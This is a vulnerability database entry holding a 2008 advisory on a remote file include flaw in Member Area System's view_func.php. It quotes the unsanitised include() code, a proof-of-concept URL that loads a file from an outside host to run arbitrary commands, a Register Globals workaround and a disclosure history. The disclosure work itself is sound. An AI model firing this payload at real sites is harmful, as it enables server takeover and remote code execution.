{"securityvulns": [{"lastseen": "2018-08-31T11:10:24", "bulletinFamily": "software", "description": "----------------------------------------------------------------------\r\n\r\nMember Area System (MAS) Remote File Include Vulnerability (view_func.php)\r\n\r\n----------------------------------------------------------------------\r\n\r\nAuthor: ShipNX <ship_nx [AT] yahoo com>\r\nImpact: Remote file include\r\nStatus: Patch not available\r\n\r\n----------------------------------------------------------------------\r\n\r\nSoftware description:\r\n\r\nName: Member Area System (MAS)\r\nVersion: Vendor does not disclose version information since v1.7.\r\nProbably later versions are also vulnerable\r\nVendor: Mansion Productions\r\nVendor homepage: http://www.mansionproductions.com/\r\nSoftware homepage: http://www.mansionproductions.com/mas/\r\n\r\nDescription:\r\nMAS is a leading content management system (CMS) specially designed \r\nfor adult-oriented sites managements. It is used on many major adult\r\nsites around the world.\r\n\r\n----------------------------------------------------------------------\r\n\r\nVulnerability:\r\n\r\nCode: view_func.php\r\n\r\n...\r\n$path=dirname($i).'/';\r\ninclude($path.$l.'/'.'filelist.mas');\r\n...\r\n\r\nThe variables $i and $l are not properly sanitized\r\nbefore using them in include() construction. \r\nIf Register Globals = On and Allow URL Include (Allow URL Fopen) = On\r\nthen an attacker can send the malicious request leading to remote\r\nfile include and therefore arbitrary command execution.\r\n\r\n---------------------------------------------------------------------\r\n\r\nPOC:\r\n\r\nConditions:\r\nRegister Globals = On\r\nAllow URL fopen (Allow URL include since PHP 5.2.0) = On\r\n\r\nhttp://affectedsite.com/view_func.php?i=http://remotesite.com/justsomedir/&l=testfile.txt?\r\n\r\nNote: \r\n\r\njustsomedir/ is required here as data passed via $i first gets sent to dirname() function\r\nwhich will product\r\n\r\n$path='http://remotesite.com/';\r\n\r\nThe remote file should be placed at http://remotesite.com/testfile.txt\r\n\r\n----------------------------------------------------------------------\r\n\r\nWorkaround:\r\n\r\nThe vendor is aware of the vuln for ages (probably since 2006) so they\r\nrecommend setting up Register Globals = Off. Not sure why they haven't\r\npatched the vuln already. If Register Globals is Off on your server, then\r\nyou are more or less secure. If it is On, ask your system administrator\r\nto turn it Off. If for some reason you need Register Globals = On on your\r\nsite (using old software etc), then contact the vendor and MAYBE they will\r\nfinally patch the bug :-)\r\n\r\n----------------------------------------------------------------------\r\n\r\nHistory:\r\n\r\nVuln found: Late 2005 :-))\r\nVendor notified: Seems like the vendor knows of the vuln since 2006, but\r\nfor some reason fails to patch the vuln. Maybe they just want it to keep\r\nquiet, or maybe the security matters just don't bother them - not sure. \r\nAnyway, maybe this advisory will finally force them to do patching :-))\r\nAdvisory: 11/01/2008\r\n\r\n----------------------------------------------------------------------\r\n\r\nThanks to:\r\n\r\nDeZender creators :-)", "modified": "2008-01-12T00:00:00", "published": "2008-01-12T00:00:00", "id": "SECURITYVULNS:DOC:18844", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:18844", "title": "Member Area System (MAS) Remote File Include Vulnerability (view_func.php)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}]}